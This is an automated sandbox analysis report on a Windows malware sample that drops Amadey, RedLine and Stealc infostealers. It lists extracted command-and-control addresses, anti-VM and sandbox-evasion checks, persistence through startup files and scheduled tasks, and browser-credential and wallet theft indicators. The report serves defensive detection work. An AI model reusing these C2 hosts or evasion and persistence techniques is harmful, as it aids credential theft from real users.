Analysis
-
max time kernel
145s -
max time network
136s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
09/08/2024, 08:30
Static task
static1
Behavioral task
behavioral1
Sample
2efc4b80fdb9b66eabf08e3507c5587cb468ed423fd084c5825cfaae05c2fca8.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral2
Sample
2efc4b80fdb9b66eabf08e3507c5587cb468ed423fd084c5825cfaae05c2fca8.exe
Resource
win11-20240802-en
General
-
Target
2efc4b80fdb9b66eabf08e3507c5587cb468ed423fd084c5825cfaae05c2fca8.exe
-
Size
1.8MB
-
MD5
54a7169c7787b93f74b4bceb783cc91e
-
SHA1
68138ff9acd3eedb7a4c7dab8003e3c9770a8736
-
SHA256
2efc4b80fdb9b66eabf08e3507c5587cb468ed423fd084c5825cfaae05c2fca8
-
SHA512
7b37ea0392c0d063c9e2146e8a80765a95a44fac949190c8d290f35c7de3c99c01ad501e6e6ee361c95c0c2ed275bb45f937564cbeed2e60792bde4560604138
-
SSDEEP
49152:W6+K4yHpYN8gyY7Mo3yZxHqri/LoVgz3YOYu:WtPyJJcMewxKXgzwu
Malware Config
Extracted
amadey
4.41
fed3aa
http://185.215.113.16
-
install_dir
44111dbc49
-
install_file
axplong.exe
-
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
-
url_paths
/Jo89Ku7d/index.php
Extracted
redline
LiveTraffic
20.52.165.210:39030
Extracted
redline
185.215.113.67:21405
Extracted
stealc
default
http://185.215.113.17
-
url_path
/2fb6c2cc8dce150a.php
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
resource yara_rule behavioral2/memory/2432-39-0x0000000000400000-0x0000000000452000-memory.dmp family_redline behavioral2/files/0x000100000002aa72-121.dat family_redline behavioral2/memory/2752-137-0x0000000000E00000-0x0000000000E52000-memory.dmp family_redline -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2efc4b80fdb9b66eabf08e3507c5587cb468ed423fd084c5825cfaae05c2fca8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 48 3176 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 2132 powershell.exe 3864 powershell.exe 4832 powershell.exe 3696 powershell.exe 4520 powershell.exe 2244 powershell.EXE -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2efc4b80fdb9b66eabf08e3507c5587cb468ed423fd084c5825cfaae05c2fca8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2efc4b80fdb9b66eabf08e3507c5587cb468ed423fd084c5825cfaae05c2fca8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1735401866-3802634615-1355934272-1000\Control Panel\International\Geo\Nation FkNsISq.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8FeWTczXFCnSnVvXNQl1GpVc.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JAr9JDmg2L4TQZjkKInPZ7yz.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0DoEw4oFKlkxa3cgWOvbFZ9p.bat msbuild.exe -
Executes dropped EXE 22 IoCs
pid Process 2252 axplong.exe 3700 GOLD.exe 2232 crypteda.exe 1364 newalp.exe 3348 Hkbsse.exe 4820 HmP7CLDlaU.exe 2224 c26v2TJg1I.exe 2752 06082025.exe 3688 stealc_default.exe 4012 umrfile%20.exe 1924 8KqekEVuYzbYRyGlJGfRzbRe.exe 2396 Tek7hdlMKZxKFpJqZ1QkZduR.exe 2780 Install.exe 3032 Install.exe 1588 axplong.exe 4044 Hkbsse.exe 5088 Install.exe 3896 axplong.exe 2328 Hkbsse.exe 4432 FkNsISq.exe 4008 axplong.exe 2416 Hkbsse.exe -
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1735401866-3802634615-1355934272-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-1735401866-3802634615-1355934272-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-1735401866-3802634615-1355934272-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-1735401866-3802634615-1355934272-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-1735401866-3802634615-1355934272-1000\Software\Wine 2efc4b80fdb9b66eabf08e3507c5587cb468ed423fd084c5825cfaae05c2fca8.exe -
Indirect Command Execution 1 TTPs 17 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid Process 1512 forfiles.exe 4984 forfiles.exe 2736 forfiles.exe 4688 forfiles.exe 2876 forfiles.exe 836 forfiles.exe 3248 forfiles.exe 4528 forfiles.exe 496 forfiles.exe 3120 forfiles.exe 3260 forfiles.exe 1060 forfiles.exe 2116 forfiles.exe 4580 forfiles.exe 3724 forfiles.exe 1284 forfiles.exe 4428 forfiles.exe -
Loads dropped DLL 3 IoCs
pid Process 3688 stealc_default.exe 3688 stealc_default.exe 3176 rundll32.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json FkNsISq.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json FkNsISq.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini Install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
flow ioc 21 pastebin.com 26 raw.githubusercontent.com 28 iplogger.com 2 pastebin.com 10 raw.githubusercontent.com 10 iplogger.com 18 raw.githubusercontent.com -
Drops file in System32 directory 31 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 FkNsISq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\54E176903A096E58E807B60E1BDFA85C FkNsISq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_9CE832D646FBAFC5C4ACFC523FDD84AD FkNsISq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies FkNsISq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft FkNsISq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_68D058512F3515153DEB95A1F4E72552 FkNsISq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\54E176903A096E58E807B60E1BDFA85C FkNsISq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 FkNsISq.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 FkNsISq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_5CF45833F44BFC2995315451A3896ACA FkNsISq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 FkNsISq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content FkNsISq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA FkNsISq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA FkNsISq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 FkNsISq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_68D058512F3515153DEB95A1F4E72552 FkNsISq.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache FkNsISq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 FkNsISq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_9CE832D646FBAFC5C4ACFC523FDD84AD FkNsISq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE FkNsISq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData FkNsISq.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol FkNsISq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_5CF45833F44BFC2995315451A3896ACA FkNsISq.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 4428 2efc4b80fdb9b66eabf08e3507c5587cb468ed423fd084c5825cfaae05c2fca8.exe 2252 axplong.exe 1588 axplong.exe 3896 axplong.exe 4008 axplong.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 3700 set thread context of 2432 3700 GOLD.exe 83 PID 2232 set thread context of 1888 2232 crypteda.exe 88 PID 4012 set thread context of 3700 4012 umrfile%20.exe 99 -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\isELTbHVU\MYpLyLp.xml FkNsISq.exe File created C:\Program Files (x86)\RJQEYlaXIdKEC\vJHsSJB.xml FkNsISq.exe File created C:\Program Files (x86)\qUxPWOOJDmUn\VLnbnTD.dll FkNsISq.exe File created C:\Program Files (x86)\isELTbHVU\IeOfuV.dll FkNsISq.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi FkNsISq.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi FkNsISq.exe File created C:\Program Files (x86)\PkHXoyfIcMTU2\HTlEEvx.xml FkNsISq.exe File created C:\Program Files (x86)\RJQEYlaXIdKEC\xKequfU.dll FkNsISq.exe File created C:\Program Files (x86)\wcWwepsXFbYvlLqpBMR\RnJyeku.xml FkNsISq.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak FkNsISq.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak FkNsISq.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja FkNsISq.exe File created C:\Program Files (x86)\PkHXoyfIcMTU2\fIOeiODffuTVO.dll FkNsISq.exe File created C:\Program Files (x86)\wcWwepsXFbYvlLqpBMR\XyghadF.dll FkNsISq.exe -
Drops file in Windows directory 6 IoCs
description ioc Process File created C:\Windows\Tasks\QgKmVbYLTduGZihKC.job schtasks.exe File created C:\Windows\Tasks\axplong.job 2efc4b80fdb9b66eabf08e3507c5587cb468ed423fd084c5825cfaae05c2fca8.exe File created C:\Windows\Tasks\Hkbsse.job newalp.exe File created C:\Windows\Tasks\bvobQgTgLADiTwblyc.job schtasks.exe File created C:\Windows\Tasks\pihWnfNzBScFsSymW.job schtasks.exe File created C:\Windows\Tasks\khbketUpMZqoMqg.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 972 5088 WerFault.exe 133 1604 3032 WerFault.exe 103 4752 4432 WerFault.exe 226 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language axplong.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msbuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FkNsISq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language crypteda.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GOLD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8KqekEVuYzbYRyGlJGfRzbRe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language stealc_default.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gpupdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 stealc_default.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString stealc_default.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Tek7hdlMKZxKFpJqZ1QkZduR.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Tek7hdlMKZxKFpJqZ1QkZduR.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created 